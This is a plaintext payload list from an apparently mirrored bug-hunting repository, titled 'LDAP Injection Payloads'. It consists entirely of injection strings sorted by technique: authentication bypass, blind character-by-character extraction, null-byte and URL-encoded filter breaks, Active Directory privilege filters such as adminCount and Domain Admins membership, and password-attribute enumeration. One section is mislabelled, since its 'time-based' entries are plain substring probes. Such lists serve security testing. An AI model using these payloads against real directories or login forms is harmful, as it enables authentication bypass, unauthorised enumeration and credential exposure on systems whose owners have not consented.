mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 11:35:51 +00:00
copilot-swe-agent[bot]
68b76036df
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
141 lines
2.0 KiB
Plaintext
141 lines
2.0 KiB
Plaintext
# LDAP Injection Payloads
|
|
|
|
# Basic LDAP injection
|
|
*
|
|
*(uid=*)
|
|
*(cn=*)
|
|
*(objectClass=*)
|
|
|
|
# Authentication bypass
|
|
*)(uid=*))(|(uid=*
|
|
*)(|(uid=*))
|
|
*)(cn=admin)(|(cn=*
|
|
admin)(&(uid=*))
|
|
|
|
# Filter bypass
|
|
*)(objectClass=*))(&(objectClass=*
|
|
*)(|(password=*))
|
|
*)(cn=*)(|(cn=*
|
|
|
|
# Blind LDAP injection
|
|
*)(cn=a*
|
|
*)(cn=ad*
|
|
*)(cn=adm*
|
|
*)(cn=admin*
|
|
|
|
# Boolean-based
|
|
(&(uid=admin)(password=*))
|
|
(&(uid=admin)(!(password=wrong)))
|
|
(|(uid=admin)(uid=administrator))
|
|
|
|
# Wildcard usage
|
|
uid=*
|
|
cn=*
|
|
sn=*
|
|
mail=*
|
|
|
|
# Attribute extraction
|
|
*)(objectClass=*))(%26(objectClass=*
|
|
*)(uid=*))(%26(uid=*
|
|
|
|
# Extended filter injection
|
|
*)(|(objectClass=*))
|
|
*))%00
|
|
%28%29
|
|
%26
|
|
%7C
|
|
*()|%26'
|
|
*()|&'
|
|
*(|(mail=*))
|
|
*(|(objectclass=*))
|
|
|
|
# Advanced authentication bypass
|
|
*)(&(objectClass=*))
|
|
*))%00(cn=administrator
|
|
admin*)((|userpassword=*)
|
|
admin*)((|mail=*))
|
|
*)((|(cn=*))
|
|
*)(uid=*))(&(uid=*))
|
|
|
|
# Privilege escalation attempts
|
|
*)(userAccountControl:1.2.840.113556.1.4.803:=512)
|
|
*)(adminCount=1)
|
|
*)(memberOf=CN=Domain Admins*)
|
|
*)(memberOf=*)
|
|
|
|
# Time-based blind LDAP injection
|
|
*)(cn=admin))(|(cn=*
|
|
*)(cn=a*)(|(cn=*
|
|
*)(cn=ab*)(|(cn=*
|
|
*)(cn=abc*)(|(cn=*
|
|
|
|
# Special characters and encoding
|
|
%2a
|
|
%28
|
|
%29
|
|
%26
|
|
%7c
|
|
*%00
|
|
%00*
|
|
*%20
|
|
%20*
|
|
|
|
# DN injection
|
|
cn=*,ou=*,dc=*
|
|
cn=admin,ou=*,dc=*
|
|
cn=*,ou=users,dc=*
|
|
|
|
# Multi-attribute injection
|
|
(&(uid=admin)(userPassword=*))
|
|
(&(cn=admin)(mail=*))
|
|
(&(objectClass=person)(uid=*))
|
|
(|(&(uid=admin)(userPassword=*))(uid=backup))
|
|
|
|
# Error-based injection
|
|
()
|
|
(&)
|
|
(|)
|
|
(!)
|
|
(&(uid=admin)(!(cn=*)))
|
|
|
|
# Filter chain attacks
|
|
*))(|(objectClass=*
|
|
*))(|(mail=*
|
|
*))(|(userPassword=*
|
|
|
|
# Attribute enumeration
|
|
(uid=*)
|
|
(cn=*)
|
|
(sn=*)
|
|
(mail=*)
|
|
(telephoneNumber=*)
|
|
(userPassword=*)
|
|
(description=*)
|
|
|
|
# Nested filter injection
|
|
(&(uid=admin)(&(cn=*)))
|
|
(|(&(uid=admin)(cn=*))(uid=test))
|
|
(&(objectClass=person)(|(uid=admin)(uid=root)))
|
|
|
|
# Comment injection
|
|
*);#
|
|
*);--
|
|
*)//
|
|
|
|
# Group enumeration
|
|
(memberOf=cn=admins*)
|
|
(memberOf=cn=users*)
|
|
(memberOf=*)
|
|
|
|
# Substring search
|
|
(cn=adm*)
|
|
(cn=*admin)
|
|
(cn=*admin*)
|
|
(uid=a*)
|
|
(mail=*@admin.com)
|
|
|
|
# Range queries
|
|
(uidNumber>=1000)
|
|
(uidNumber<=5000)
|
|
(createTimestamp>=20200101000000Z)
|